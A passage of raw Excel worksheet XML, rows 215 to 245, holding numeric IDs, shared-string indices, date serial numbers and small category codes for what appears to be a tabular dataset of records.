      <c r="G215" s="10">
        <v>41787.589583333334</v>
      </c>
      <c r="H215" s="9">
        <v>1350209</v>
      </c>
      <c r="I215" s="9" t="s">
        <v>2325</v>
      </c>
      <c r="J215" s="10">
        <v>41784.147222222222</v>
      </c>
      <c r="K215" s="9" t="s">
        <v>1014</v>
      </c>
      <c r="L215" s="7">
        <v>6</v>
      </c>
      <c r="M215" s="7">
        <v>4</v>
      </c>
      <c r="N215" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="216" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A216" s="3">
        <v>94608</v>
      </c>
      <c r="B216" s="3" t="s">
        <v>566</v>
      </c>
      <c r="C216" s="9" t="s">
        <v>2326</v>
      </c>
      <c r="D216" s="9" t="s">
        <v>2327</v>
      </c>
      <c r="E216" s="9">
        <v>1402846</v>
      </c>
      <c r="F216" s="9" t="s">
        <v>1794</v>
      </c>
      <c r="G216" s="10">
        <v>42642.393750000003</v>
      </c>
      <c r="H216" s="9">
        <v>3184087</v>
      </c>
      <c r="I216" s="9" t="s">
        <v>2328</v>
      </c>
      <c r="J216" s="10">
        <v>42641.034722222219</v>
      </c>
      <c r="K216" s="3" t="s">
        <v>567</v>
      </c>
      <c r="L216" s="4">
        <v>9</v>
      </c>
      <c r="M216" s="4">
        <v>7</v>
      </c>
      <c r="N216" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O216" s="3"/>
      <c r="P216" s="3"/>
      <c r="Q216" s="3"/>
    </row>
    <row r="217" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A217" s="9">
        <v>94906</v>
      </c>
      <c r="B217" s="9" t="s">
        <v>1015</v>
      </c>
      <c r="C217" s="9" t="s">
        <v>2329</v>
      </c>
      <c r="D217" s="9" t="s">
        <v>2330</v>
      </c>
      <c r="E217" s="9">
        <v>8409</v>
      </c>
      <c r="F217" s="9" t="s">
        <v>2331</v>
      </c>
      <c r="G217" s="10">
        <v>39843.632638888892</v>
      </c>
      <c r="H217" s="9">
        <v>17174</v>
      </c>
      <c r="I217" s="9" t="s">
        <v>2332</v>
      </c>
      <c r="J217" s="10">
        <v>39842.927777777775</v>
      </c>
      <c r="K217" s="9" t="s">
        <v>1016</v>
      </c>
      <c r="L217" s="7">
        <v>4</v>
      </c>
      <c r="M217" s="7">
        <v>2</v>
      </c>
      <c r="N217" s="9" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="218" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A218" s="3">
        <v>95016</v>
      </c>
      <c r="B218" s="3" t="s">
        <v>568</v>
      </c>
      <c r="C218" s="9" t="s">
        <v>2333</v>
      </c>
      <c r="D218" s="9" t="s">
        <v>2334</v>
      </c>
      <c r="E218" s="9">
        <v>8701</v>
      </c>
      <c r="F218" s="9" t="s">
        <v>1927</v>
      </c>
      <c r="G218" s="10">
        <v>39711.945833333331</v>
      </c>
      <c r="H218" s="9">
        <v>8701</v>
      </c>
      <c r="I218" s="9" t="s">
        <v>1927</v>
      </c>
      <c r="J218" s="10">
        <v>39711.941666666666</v>
      </c>
      <c r="K218" s="3" t="s">
        <v>569</v>
      </c>
      <c r="L218" s="4">
        <v>4</v>
      </c>
      <c r="M218" s="4">
        <v>1</v>
      </c>
      <c r="N218" s="3"/>
      <c r="O218" s="3"/>
      <c r="P218" s="3" t="s">
        <v>711</v>
      </c>
      <c r="Q218" s="3"/>
    </row>
    <row r="219" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A219" s="9">
        <v>96463</v>
      </c>
      <c r="B219" s="9" t="s">
        <v>1017</v>
      </c>
      <c r="C219" s="9" t="s">
        <v>2335</v>
      </c>
      <c r="D219" s="9" t="s">
        <v>2336</v>
      </c>
      <c r="E219" s="9">
        <v>13281</v>
      </c>
      <c r="F219" s="9" t="s">
        <v>2143</v>
      </c>
      <c r="G219" s="10">
        <v>41320.71875</v>
      </c>
      <c r="H219" s="9">
        <v>42106</v>
      </c>
      <c r="I219" s="9" t="s">
        <v>2337</v>
      </c>
      <c r="J219" s="10">
        <v>41320.674305555556</v>
      </c>
      <c r="K219" s="9" t="s">
        <v>1018</v>
      </c>
      <c r="L219" s="7">
        <v>5</v>
      </c>
      <c r="M219" s="7">
        <v>3</v>
      </c>
      <c r="O219" s="9" t="s">
        <v>703</v>
      </c>
      <c r="Q219" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="220" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A220" s="9">
        <v>97197</v>
      </c>
      <c r="B220" s="9" t="s">
        <v>1019</v>
      </c>
      <c r="C220" s="9" t="s">
        <v>2338</v>
      </c>
      <c r="D220" s="9" t="s">
        <v>2339</v>
      </c>
      <c r="E220" s="9">
        <v>1709587</v>
      </c>
      <c r="F220" s="9" t="s">
        <v>2340</v>
      </c>
      <c r="G220" s="10">
        <v>42750.626388888886</v>
      </c>
      <c r="H220" s="9">
        <v>815724</v>
      </c>
      <c r="I220" s="9" t="s">
        <v>2341</v>
      </c>
      <c r="J220" s="10">
        <v>41356.804166666669</v>
      </c>
      <c r="K220" s="9" t="s">
        <v>1020</v>
      </c>
      <c r="L220" s="7">
        <v>5</v>
      </c>
      <c r="M220" s="7">
        <v>3</v>
      </c>
      <c r="N220" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="221" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A221" s="3">
        <v>97290</v>
      </c>
      <c r="B221" s="3" t="s">
        <v>570</v>
      </c>
      <c r="C221" s="9" t="s">
        <v>2342</v>
      </c>
      <c r="D221" s="9" t="s">
        <v>2343</v>
      </c>
      <c r="E221" s="9">
        <v>6682</v>
      </c>
      <c r="F221" s="9" t="s">
        <v>2344</v>
      </c>
      <c r="G221" s="10">
        <v>43049.281944444447</v>
      </c>
      <c r="H221" s="9">
        <v>4664804</v>
      </c>
      <c r="I221" s="9" t="s">
        <v>1748</v>
      </c>
      <c r="J221" s="10">
        <v>43041.709027777775</v>
      </c>
      <c r="K221" s="3" t="s">
        <v>571</v>
      </c>
      <c r="L221" s="4">
        <v>6</v>
      </c>
      <c r="M221" s="4">
        <v>4</v>
      </c>
      <c r="N221" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O221" s="3"/>
      <c r="P221" s="3"/>
      <c r="Q221" s="3"/>
    </row>
    <row r="222" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A222" s="9">
        <v>97459</v>
      </c>
      <c r="B222" s="9" t="s">
        <v>1021</v>
      </c>
      <c r="C222" s="9" t="s">
        <v>2345</v>
      </c>
      <c r="D222" s="9" t="s">
        <v>2346</v>
      </c>
      <c r="E222" s="9">
        <v>536</v>
      </c>
      <c r="F222" s="9" t="s">
        <v>2347</v>
      </c>
      <c r="G222" s="10">
        <v>40208.646527777775</v>
      </c>
      <c r="H222" s="9">
        <v>63550</v>
      </c>
      <c r="I222" s="9" t="s">
        <v>1722</v>
      </c>
      <c r="J222" s="10">
        <v>40207.888888888891</v>
      </c>
      <c r="K222" s="9" t="s">
        <v>1022</v>
      </c>
      <c r="L222" s="7">
        <v>6</v>
      </c>
      <c r="M222" s="7">
        <v>4</v>
      </c>
      <c r="N222" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="223" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A223" s="9">
        <v>98650</v>
      </c>
      <c r="B223" s="9" t="s">
        <v>1023</v>
      </c>
      <c r="C223" s="9" t="s">
        <v>2348</v>
      </c>
      <c r="D223" s="9" t="s">
        <v>2349</v>
      </c>
      <c r="E223" s="9">
        <v>426671</v>
      </c>
      <c r="F223" s="9" t="s">
        <v>2170</v>
      </c>
      <c r="G223" s="10">
        <v>42816.683333333334</v>
      </c>
      <c r="H223" s="9">
        <v>7275984</v>
      </c>
      <c r="I223" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J223" s="10">
        <v>42815.859722222223</v>
      </c>
      <c r="K223" s="9" t="s">
        <v>1024</v>
      </c>
      <c r="L223" s="7">
        <v>8</v>
      </c>
      <c r="M223" s="7">
        <v>6</v>
      </c>
      <c r="N223" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="224" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A224" s="3">
        <v>98702</v>
      </c>
      <c r="B224" s="3" t="s">
        <v>598</v>
      </c>
      <c r="C224" s="9" t="s">
        <v>2350</v>
      </c>
      <c r="D224" s="9" t="s">
        <v>2351</v>
      </c>
      <c r="E224" s="9">
        <v>2157640</v>
      </c>
      <c r="F224" s="9" t="s">
        <v>2352</v>
      </c>
      <c r="G224" s="10">
        <v>43024.615277777775</v>
      </c>
      <c r="H224" s="9">
        <v>2436175</v>
      </c>
      <c r="I224" s="9" t="s">
        <v>2353</v>
      </c>
      <c r="J224" s="10">
        <v>43021.755555555559</v>
      </c>
      <c r="K224" s="3" t="s">
        <v>599</v>
      </c>
      <c r="L224" s="4">
        <v>8</v>
      </c>
      <c r="M224" s="4">
        <v>6</v>
      </c>
      <c r="N224" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O224" s="3"/>
      <c r="P224" s="3"/>
      <c r="Q224" s="3"/>
    </row>
    <row r="225" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A225" s="3">
        <v>98838</v>
      </c>
      <c r="B225" s="3" t="s">
        <v>666</v>
      </c>
      <c r="C225" s="9" t="s">
        <v>2354</v>
      </c>
      <c r="D225" s="9" t="s">
        <v>2355</v>
      </c>
      <c r="E225" s="9">
        <v>272287</v>
      </c>
      <c r="F225" s="9" t="s">
        <v>2356</v>
      </c>
      <c r="G225" s="10">
        <v>42055.195833333331</v>
      </c>
      <c r="H225" s="9">
        <v>272287</v>
      </c>
      <c r="I225" s="9" t="s">
        <v>2356</v>
      </c>
      <c r="J225" s="10">
        <v>42055.195833333331</v>
      </c>
      <c r="K225" s="3" t="s">
        <v>667</v>
      </c>
      <c r="L225" s="4">
        <v>4</v>
      </c>
      <c r="M225" s="4">
        <v>2</v>
      </c>
      <c r="N225" s="3" t="s">
        <v>696</v>
      </c>
      <c r="O225" s="3"/>
      <c r="P225" s="3"/>
      <c r="Q225" s="3"/>
    </row>
    <row r="226" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A226" s="9">
        <v>100003</v>
      </c>
      <c r="B226" s="9" t="s">
        <v>1025</v>
      </c>
      <c r="C226" s="9" t="s">
        <v>2357</v>
      </c>
      <c r="D226" s="9" t="s">
        <v>2358</v>
      </c>
      <c r="E226" s="9">
        <v>9951</v>
      </c>
      <c r="F226" s="9" t="s">
        <v>2359</v>
      </c>
      <c r="G226" s="10">
        <v>41690.602777777778</v>
      </c>
      <c r="H226" s="9">
        <v>321731</v>
      </c>
      <c r="I226" s="9" t="s">
        <v>2360</v>
      </c>
      <c r="J226" s="10">
        <v>41690.37777777778</v>
      </c>
      <c r="K226" s="9" t="s">
        <v>1026</v>
      </c>
      <c r="L226" s="7">
        <v>10</v>
      </c>
      <c r="M226" s="7">
        <v>8</v>
      </c>
      <c r="N226" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="227" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A227" s="3">
        <v>100484</v>
      </c>
      <c r="B227" s="3" t="s">
        <v>668</v>
      </c>
      <c r="C227" s="9" t="s">
        <v>2361</v>
      </c>
      <c r="D227" s="9" t="s">
        <v>2362</v>
      </c>
      <c r="E227" s="9">
        <v>17585</v>
      </c>
      <c r="F227" s="9" t="s">
        <v>2363</v>
      </c>
      <c r="G227" s="10">
        <v>39710.362500000003</v>
      </c>
      <c r="H227" s="9">
        <v>17585</v>
      </c>
      <c r="I227" s="9" t="s">
        <v>2363</v>
      </c>
      <c r="J227" s="10">
        <v>39710.352083333331</v>
      </c>
      <c r="K227" s="3" t="s">
        <v>669</v>
      </c>
      <c r="L227" s="4">
        <v>2</v>
      </c>
      <c r="M227" s="4">
        <v>1</v>
      </c>
      <c r="N227" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O227" s="3"/>
      <c r="P227" s="3"/>
      <c r="Q227" s="3"/>
    </row>
    <row r="228" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A228" s="3">
        <v>100621</v>
      </c>
      <c r="B228" s="3" t="s">
        <v>670</v>
      </c>
      <c r="C228" s="9" t="s">
        <v>2364</v>
      </c>
      <c r="D228" s="9" t="s">
        <v>2365</v>
      </c>
      <c r="E228" s="9">
        <v>3320</v>
      </c>
      <c r="F228" s="9" t="s">
        <v>2366</v>
      </c>
      <c r="G228" s="10">
        <v>39710.404166666667</v>
      </c>
      <c r="H228" s="9">
        <v>3320</v>
      </c>
      <c r="I228" s="9" t="s">
        <v>2366</v>
      </c>
      <c r="J228" s="10">
        <v>39710.40347222222</v>
      </c>
      <c r="K228" s="3" t="s">
        <v>671</v>
      </c>
      <c r="L228" s="4">
        <v>3</v>
      </c>
      <c r="M228" s="4">
        <v>1</v>
      </c>
      <c r="N228" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O228" s="3"/>
      <c r="P228" s="3"/>
      <c r="Q228" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="229" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A229" s="3">
        <v>100787</v>
      </c>
      <c r="B229" s="3" t="s">
        <v>672</v>
      </c>
      <c r="C229" s="9" t="s">
        <v>2367</v>
      </c>
      <c r="D229" s="9" t="s">
        <v>2368</v>
      </c>
      <c r="E229" s="9">
        <v>550314</v>
      </c>
      <c r="F229" s="9" t="s">
        <v>2369</v>
      </c>
      <c r="G229" s="10">
        <v>43356.51458333333</v>
      </c>
      <c r="H229" s="9">
        <v>550314</v>
      </c>
      <c r="I229" s="9" t="s">
        <v>2369</v>
      </c>
      <c r="J229" s="10">
        <v>43356.513194444444</v>
      </c>
      <c r="K229" s="3" t="s">
        <v>673</v>
      </c>
      <c r="L229" s="4">
        <v>3</v>
      </c>
      <c r="M229" s="4">
        <v>1</v>
      </c>
      <c r="N229" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O229" s="3" t="s">
        <v>698</v>
      </c>
      <c r="P229" s="3"/>
      <c r="Q229" s="3"/>
    </row>
    <row r="230" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A230" s="9">
        <v>101055</v>
      </c>
      <c r="B230" s="9" t="s">
        <v>1027</v>
      </c>
      <c r="C230" s="9" t="s">
        <v>2370</v>
      </c>
      <c r="D230" s="9" t="s">
        <v>2371</v>
      </c>
      <c r="E230" s="9">
        <v>811</v>
      </c>
      <c r="F230" s="9" t="s">
        <v>2372</v>
      </c>
      <c r="G230" s="10">
        <v>40344.886111111111</v>
      </c>
      <c r="H230" s="9">
        <v>811</v>
      </c>
      <c r="I230" s="9" t="s">
        <v>2372</v>
      </c>
      <c r="J230" s="10">
        <v>40344.882638888892</v>
      </c>
      <c r="K230" s="9" t="s">
        <v>1028</v>
      </c>
      <c r="L230" s="7">
        <v>10</v>
      </c>
      <c r="M230" s="7">
        <v>8</v>
      </c>
      <c r="N230" s="9" t="s">
        <v>704</v>
      </c>
      <c r="O230" s="9" t="s">
        <v>697</v>
      </c>
    </row>
    <row r="231" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A231" s="9">
        <v>101268</v>
      </c>
      <c r="B231" s="9" t="s">
        <v>1029</v>
      </c>
      <c r="C231" s="9" t="s">
        <v>2373</v>
      </c>
      <c r="D231" s="9" t="s">
        <v>2374</v>
      </c>
      <c r="E231" s="9">
        <v>192247</v>
      </c>
      <c r="F231" s="9" t="s">
        <v>2375</v>
      </c>
      <c r="G231" s="10">
        <v>40373.854861111111</v>
      </c>
      <c r="H231" s="9">
        <v>12855</v>
      </c>
      <c r="I231" s="9" t="s">
        <v>2376</v>
      </c>
      <c r="J231" s="10">
        <v>40345.647916666669</v>
      </c>
      <c r="K231" s="9" t="s">
        <v>1030</v>
      </c>
      <c r="L231" s="7">
        <v>17</v>
      </c>
      <c r="M231" s="7">
        <v>15</v>
      </c>
      <c r="N231" s="9" t="s">
        <v>697</v>
      </c>
    </row>
    <row r="232" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A232" s="9">
        <v>101664</v>
      </c>
      <c r="B232" s="9" t="s">
        <v>1031</v>
      </c>
      <c r="C232" s="9" t="s">
        <v>2377</v>
      </c>
      <c r="D232" s="9" t="s">
        <v>2378</v>
      </c>
      <c r="E232" s="9">
        <v>1853</v>
      </c>
      <c r="F232" s="9" t="s">
        <v>2379</v>
      </c>
      <c r="G232" s="10">
        <v>39710.6875</v>
      </c>
      <c r="H232" s="9">
        <v>1120</v>
      </c>
      <c r="I232" s="9" t="s">
        <v>2380</v>
      </c>
      <c r="J232" s="10">
        <v>39710.614583333336</v>
      </c>
      <c r="K232" s="9" t="s">
        <v>1032</v>
      </c>
      <c r="L232" s="7">
        <v>4</v>
      </c>
      <c r="M232" s="7">
        <v>1</v>
      </c>
      <c r="N232" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="233" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A233" s="3">
        <v>102095</v>
      </c>
      <c r="B233" s="3" t="s">
        <v>674</v>
      </c>
      <c r="C233" s="9" t="s">
        <v>2381</v>
      </c>
      <c r="D233" s="9" t="s">
        <v>2382</v>
      </c>
      <c r="E233" s="9">
        <v>536</v>
      </c>
      <c r="F233" s="9" t="s">
        <v>2347</v>
      </c>
      <c r="G233" s="10">
        <v>40208.64166666667</v>
      </c>
      <c r="H233" s="9">
        <v>63550</v>
      </c>
      <c r="I233" s="9" t="s">
        <v>1722</v>
      </c>
      <c r="J233" s="10">
        <v>40207.893055555556</v>
      </c>
      <c r="K233" s="3" t="s">
        <v>675</v>
      </c>
      <c r="L233" s="4">
        <v>6</v>
      </c>
      <c r="M233" s="4">
        <v>4</v>
      </c>
      <c r="N233" s="3"/>
      <c r="O233" s="3" t="s">
        <v>706</v>
      </c>
      <c r="P233" s="3"/>
      <c r="Q233" s="3"/>
    </row>
    <row r="234" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A234" s="9">
        <v>102567</v>
      </c>
      <c r="B234" s="9" t="s">
        <v>1033</v>
      </c>
      <c r="C234" s="9" t="s">
        <v>2383</v>
      </c>
      <c r="D234" s="9" t="s">
        <v>2384</v>
      </c>
      <c r="E234" s="9">
        <v>352101</v>
      </c>
      <c r="F234" s="9" t="s">
        <v>2385</v>
      </c>
      <c r="G234" s="10">
        <v>42459.6875</v>
      </c>
      <c r="H234" s="9">
        <v>294884</v>
      </c>
      <c r="I234" s="9" t="s">
        <v>2386</v>
      </c>
      <c r="J234" s="10">
        <v>42105.146527777775</v>
      </c>
      <c r="K234" s="9" t="s">
        <v>1034</v>
      </c>
      <c r="L234" s="7">
        <v>3</v>
      </c>
      <c r="M234" s="7">
        <v>1</v>
      </c>
      <c r="Q234" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="235" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A235" s="3">
        <v>104258</v>
      </c>
      <c r="B235" s="3" t="s">
        <v>676</v>
      </c>
      <c r="C235" s="9" t="s">
        <v>2387</v>
      </c>
      <c r="D235" s="9" t="s">
        <v>2388</v>
      </c>
      <c r="E235" s="9">
        <v>4685</v>
      </c>
      <c r="F235" s="9" t="s">
        <v>2306</v>
      </c>
      <c r="G235" s="10">
        <v>42250.374305555553</v>
      </c>
      <c r="H235" s="9">
        <v>4335407</v>
      </c>
      <c r="I235" s="9" t="s">
        <v>2389</v>
      </c>
      <c r="J235" s="10">
        <v>42243.90902777778</v>
      </c>
      <c r="K235" s="3" t="s">
        <v>677</v>
      </c>
      <c r="L235" s="4">
        <v>5</v>
      </c>
      <c r="M235" s="4">
        <v>3</v>
      </c>
      <c r="N235" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O235" s="3" t="s">
        <v>700</v>
      </c>
      <c r="P235" s="3"/>
      <c r="Q235" s="3"/>
    </row>
    <row r="236" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A236" s="9">
        <v>104322</v>
      </c>
      <c r="B236" s="9" t="s">
        <v>1035</v>
      </c>
      <c r="C236" s="9" t="s">
        <v>2390</v>
      </c>
      <c r="D236" s="9" t="s">
        <v>2391</v>
      </c>
      <c r="E236" s="9">
        <v>3906760</v>
      </c>
      <c r="F236" s="9" t="s">
        <v>2392</v>
      </c>
      <c r="G236" s="10">
        <v>41909.991666666669</v>
      </c>
      <c r="H236" s="9">
        <v>15124</v>
      </c>
      <c r="I236" s="9" t="s">
        <v>2393</v>
      </c>
      <c r="J236" s="10">
        <v>39710.995833333334</v>
      </c>
      <c r="K236" s="9" t="s">
        <v>1036</v>
      </c>
      <c r="L236" s="7">
        <v>3</v>
      </c>
      <c r="M236" s="7">
        <v>1</v>
      </c>
      <c r="O236" s="9" t="s">
        <v>697</v>
      </c>
      <c r="Q236" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="237" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A237" s="9">
        <v>106175</v>
      </c>
      <c r="B237" s="9" t="s">
        <v>1037</v>
      </c>
      <c r="C237" s="9" t="s">
        <v>2394</v>
      </c>
      <c r="D237" s="9" t="s">
        <v>2395</v>
      </c>
      <c r="E237" s="9">
        <v>15127</v>
      </c>
      <c r="F237" s="9" t="s">
        <v>2396</v>
      </c>
      <c r="G237" s="10">
        <v>41197.099305555559</v>
      </c>
      <c r="H237" s="9">
        <v>63550</v>
      </c>
      <c r="I237" s="9" t="s">
        <v>1722</v>
      </c>
      <c r="J237" s="10">
        <v>41195.831250000003</v>
      </c>
      <c r="K237" s="9" t="s">
        <v>1038</v>
      </c>
      <c r="L237" s="7">
        <v>4</v>
      </c>
      <c r="M237" s="7">
        <v>2</v>
      </c>
      <c r="N237" s="13" t="s">
        <v>704</v>
      </c>
      <c r="O237" s="13" t="s">
        <v>699</v>
      </c>
      <c r="P237" s="13"/>
    </row>
    <row r="238" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A238" s="9">
        <v>106711</v>
      </c>
      <c r="B238" s="9" t="s">
        <v>1039</v>
      </c>
      <c r="C238" s="9" t="s">
        <v>2397</v>
      </c>
      <c r="D238" s="9" t="s">
        <v>2398</v>
      </c>
      <c r="E238" s="9">
        <v>17046</v>
      </c>
      <c r="F238" s="9" t="s">
        <v>2399</v>
      </c>
      <c r="G238" s="10">
        <v>39712.98541666667</v>
      </c>
      <c r="H238" s="9">
        <v>17046</v>
      </c>
      <c r="I238" s="9" t="s">
        <v>2399</v>
      </c>
      <c r="J238" s="10">
        <v>39711.063888888886</v>
      </c>
      <c r="K238" s="9" t="s">
        <v>1040</v>
      </c>
      <c r="L238" s="7">
        <v>2</v>
      </c>
      <c r="M238" s="7">
        <v>1</v>
      </c>
      <c r="Q238" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="239" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A239" s="9">
        <v>108443</v>
      </c>
      <c r="B239" s="9" t="s">
        <v>1041</v>
      </c>
      <c r="C239" s="9" t="s">
        <v>2400</v>
      </c>
      <c r="D239" s="9" t="s">
        <v>2401</v>
      </c>
      <c r="E239" s="9">
        <v>15054</v>
      </c>
      <c r="F239" s="9" t="s">
        <v>2402</v>
      </c>
      <c r="G239" s="10">
        <v>39711.656944444447</v>
      </c>
      <c r="H239" s="9">
        <v>15054</v>
      </c>
      <c r="I239" s="9" t="s">
        <v>2402</v>
      </c>
      <c r="J239" s="10">
        <v>39711.65347222222</v>
      </c>
      <c r="K239" s="9" t="s">
        <v>1042</v>
      </c>
      <c r="L239" s="7">
        <v>5</v>
      </c>
      <c r="M239" s="7">
        <v>4</v>
      </c>
      <c r="N239" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="240" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A240" s="9">
        <v>109383</v>
      </c>
      <c r="B240" s="9" t="s">
        <v>1043</v>
      </c>
      <c r="C240" s="9" t="s">
        <v>2403</v>
      </c>
      <c r="D240" s="9" t="s">
        <v>2404</v>
      </c>
      <c r="E240" s="9">
        <v>426671</v>
      </c>
      <c r="F240" s="9" t="s">
        <v>2101</v>
      </c>
      <c r="G240" s="10">
        <v>42816.68472222222</v>
      </c>
      <c r="H240" s="9">
        <v>7275984</v>
      </c>
      <c r="I240" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J240" s="10">
        <v>42815.862500000003</v>
      </c>
      <c r="K240" s="9" t="s">
        <v>1044</v>
      </c>
      <c r="L240" s="7">
        <v>9</v>
      </c>
      <c r="M240" s="7">
        <v>7</v>
      </c>
      <c r="N240" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="241" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A241" s="9">
        <v>110175</v>
      </c>
      <c r="B241" s="9" t="s">
        <v>1045</v>
      </c>
      <c r="C241" s="9" t="s">
        <v>2405</v>
      </c>
      <c r="D241" s="9" t="s">
        <v>2406</v>
      </c>
      <c r="E241" s="9">
        <v>2581872</v>
      </c>
      <c r="F241" s="9" t="s">
        <v>2407</v>
      </c>
      <c r="G241" s="10">
        <v>42106.645833333336</v>
      </c>
      <c r="H241" s="9">
        <v>52626</v>
      </c>
      <c r="I241" s="9" t="s">
        <v>2408</v>
      </c>
      <c r="J241" s="10">
        <v>40054.573611111111</v>
      </c>
      <c r="K241" s="9" t="s">
        <v>1046</v>
      </c>
      <c r="L241" s="7">
        <v>3</v>
      </c>
      <c r="M241" s="7">
        <v>1</v>
      </c>
      <c r="Q241" s="9" t="s">
        <v>1047</v>
      </c>
    </row>
    <row r="242" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A242" s="9">
        <v>110629</v>
      </c>
      <c r="B242" s="9" t="s">
        <v>1048</v>
      </c>
      <c r="C242" s="9" t="s">
        <v>2409</v>
      </c>
      <c r="D242" s="9" t="s">
        <v>2410</v>
      </c>
      <c r="E242" s="9">
        <v>7028</v>
      </c>
      <c r="F242" s="9" t="s">
        <v>2411</v>
      </c>
      <c r="G242" s="10">
        <v>39712.402083333334</v>
      </c>
      <c r="H242" s="9">
        <v>7028</v>
      </c>
      <c r="I242" s="9" t="s">
        <v>2411</v>
      </c>
      <c r="J242" s="10">
        <v>39712.396527777775</v>
      </c>
      <c r="K242" s="9" t="s">
        <v>1049</v>
      </c>
      <c r="L242" s="7">
        <v>2</v>
      </c>
      <c r="M242" s="7">
        <v>1</v>
      </c>
      <c r="N242" s="9" t="s">
        <v>699</v>
      </c>
      <c r="Q242" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="243" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A243" s="9">
        <v>111102</v>
      </c>
      <c r="B243" s="9" t="s">
        <v>1050</v>
      </c>
      <c r="C243" s="9" t="s">
        <v>2412</v>
      </c>
      <c r="D243" s="9" t="s">
        <v>2413</v>
      </c>
      <c r="E243" s="9">
        <v>229044</v>
      </c>
      <c r="F243" s="9" t="s">
        <v>2414</v>
      </c>
      <c r="G243" s="10">
        <v>42360.786111111112</v>
      </c>
      <c r="H243" s="9">
        <v>256431</v>
      </c>
      <c r="I243" s="9" t="s">
        <v>2415</v>
      </c>
      <c r="J243" s="10">
        <v>42360.243055555555</v>
      </c>
      <c r="K243" s="9" t="s">
        <v>1051</v>
      </c>
      <c r="L243" s="7">
        <v>23</v>
      </c>
      <c r="M243" s="7">
        <v>21</v>
      </c>
      <c r="N243" s="9" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="244" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A244" s="9">
        <v>111868</v>
      </c>
      <c r="B244" s="9" t="s">
        <v>1052</v>
      </c>
      <c r="C244" s="9" t="s">
        <v>2416</v>
      </c>
      <c r="D244" s="9" t="s">
        <v>2417</v>
      </c>
      <c r="E244" s="9">
        <v>4279</v>
      </c>
      <c r="F244" s="9" t="s">
        <v>1805</v>
      </c>
      <c r="G244" s="10">
        <v>39713.555555555555</v>
      </c>
      <c r="H244" s="9">
        <v>1695</v>
      </c>
      <c r="I244" s="9" t="s">
        <v>2418</v>
      </c>
      <c r="J244" s="10">
        <v>39713.518750000003</v>
      </c>
      <c r="K244" s="9" t="s">
        <v>1053</v>
      </c>
      <c r="L244" s="7">
        <v>5</v>
      </c>
      <c r="M244" s="7">
        <v>2</v>
      </c>
      <c r="N244" s="9" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="245" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A245" s="9">
        <v>113951</v>
      </c>
      <c r="B245" s="9" t="s">
        <v>1054</v>
      </c>
      <c r="C245" s="9" t="s">
        <v>2419</v>
      </c>
      <c r="D245" s="9" t="s">
        <v>2420</v>
      </c>
      <c r="E245" s="9">
        <v>20316</v>
      </c>
      <c r="F245" s="9" t="s">
        <v>2421</v>
      </c>
      <c r="G245" s="10">
        <v>39715.270833333336</v>
      </c>
      <c r="H245" s="9">
        <v>20316</v>
      </c>
      <c r="I245" s="9" t="s">
        <v>2421</v>
      </c>
      <c r="J245" s="10">
        <v>39715.259027777778</v>
      </c>
      <c r="K245" s="9" t="s">
        <v>1055</v>
      </c>
      <c r="L245" s="7">
        <v>9</v>
      </c>
      <c r="M245" s="7">
        <v>8</v>
      </c>
      <c r="N245" s="9" t="s">
        <v>696</v>
      </c>
      <c r="P245" s="9" t="s">
        <v>715</v>
      </c>
      <c r="Q245" s="9" t="s">
        <v>712</v>
      </c>
    </row>
